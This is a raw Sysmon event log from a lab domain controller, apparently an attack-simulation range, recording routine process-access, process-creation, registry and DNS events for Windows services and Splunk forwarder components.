14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.250{59A5CD1D-9634-6005-7705-00000000A301}45646728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.098{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.097{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.095{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:18.561{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000019152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 14:08:18.452{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CachedMachineNames\NameUserPrincipalWIN-DC-495$@attackrange.local 22542200x800000000000000019154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:18.481{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x800000000000000019157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:36.717{59A5CD1D-8E46-6005-1400-00000000A301}13042324C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:36.717{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 